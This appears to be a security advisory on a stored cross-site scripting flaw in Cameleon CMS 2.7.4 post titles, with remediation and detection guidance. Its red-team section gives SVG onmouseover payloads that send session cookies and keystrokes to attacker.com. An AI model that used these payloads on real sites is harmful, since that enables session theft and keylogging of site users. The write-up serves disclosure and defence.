CVE-2023-53936
Executive Summary
CVE-2023-53936 is a persistent cross-site scripting (XSS) vulnerability in Cameleon CMS version 2.7.4. An authenticated administrator can inject malicious JavaScript into post titles, which executes when other users mouse over the title. This allows session cookie theft and arbitrary JavaScript execution. The vulnerability is unpatched, and no official fix is available. The CVSS score is 0.0 due to incomplete NVD data, but the actual risk is moderate given the need for admin privileges and user interaction.

Supply Chain & Package Security
This vulnerability is not related to NPM, PyPI, Go, or Ruby packages. It is a standalone CMS application.
CVSS Breakdown & Threat Level
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
- Base Score: 4.8 (Medium)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: High (authenticated admin)
- User Interaction: Required (victim must mouse over title)
- Scope: Changed
- Confidentiality Impact: Low (session cookie theft)
- Integrity Impact: Low (arbitrary JS execution)
- Availability Impact: None
Threat Level: Medium. Exploitation requires admin credentials, but the impact includes session hijacking and potential privilege escalation.
Deep Dive & Mechanics
The vulnerability exists in the post creation functionality of Cameleon CMS 2.7.4. When an administrator creates a new post, the title field is not properly sanitized. An attacker can inject an SVG element with an onmouseover event handler. For example:
<svg onmouseover="alert('XSS')">
When any user (including other admins or visitors) hovers over the post title, the SVG event fires, executing arbitrary JavaScript. This can be used to steal session cookies via document.cookie and send them to an attacker-controlled server.
The root cause is insufficient output encoding in the template rendering engine. The title is stored in the database and rendered without HTML entity encoding, allowing script injection.
Vulnerable vs. Patched Code
Vulnerable Code (Cameleon CMS 2.7.4):
// In template file: post_title.php
echo $post['title']; // No sanitization
Patched Code (Hypothetical):
// In template file: post_title.php
echo htmlspecialchars($post['title'], ENT_QUOTES, 'UTF-8');
No official patch exists. The fix requires adding proper output encoding to all user-controlled fields.
Exploitation & Lab Setup
Red Team
Prerequisites:
- Access to Cameleon CMS admin panel (authenticated as admin)
- Ability to create or edit posts
Exploit Steps:
- Log in as an administrator.
- Navigate to "Create New Post".
- In the title field, enter:
<svg onmouseover="fetch('https://attacker.com/steal?cookie='+document.cookie)"> - Save the post.
- When any user hovers over the post title, the script executes, sending the session cookie to the attacker.
Alternative Payload (Keylogger):
<svg onmouseover="document.onkeypress=function(e){fetch('https://attacker.com/key?k='+e.key)}">
Blue Team
Detection:
- Monitor for posts containing
<svg,onmouseover, or other event handlers in titles. - Use WAF rules to block
<svgtags in input fields. - Implement Content Security Policy (CSP) to restrict script execution.
Hunting:
- Search database for posts with titles containing
onmouseoveroronload. - Review server logs for unusual
fetchorXMLHttpRequestcalls from the CMS.
Indicators of Compromise (IOCs)
- Network: Outbound HTTP requests to unknown domains containing
?cookie=or?key=parameters. - Host: Database entries with titles containing
<svg onmouseover=. - File: No specific file IOCs; the attack is stored in the database.

Remediation & Mitigation
Immediate Actions:
- Disable post creation for non-trusted administrators.
- Apply input validation to the title field: strip all HTML tags except safe ones.
- Implement output encoding using
htmlspecialchars()in PHP or equivalent in other languages.
Long-term Fix:
- Upgrade to a patched version when available.
- Use a Web Application Firewall (WAF) to block XSS patterns.
- Enforce Content Security Policy (CSP) with
script-src 'self'.
Workaround:
- Manually edit the template file to add
htmlspecialchars()around the title output.
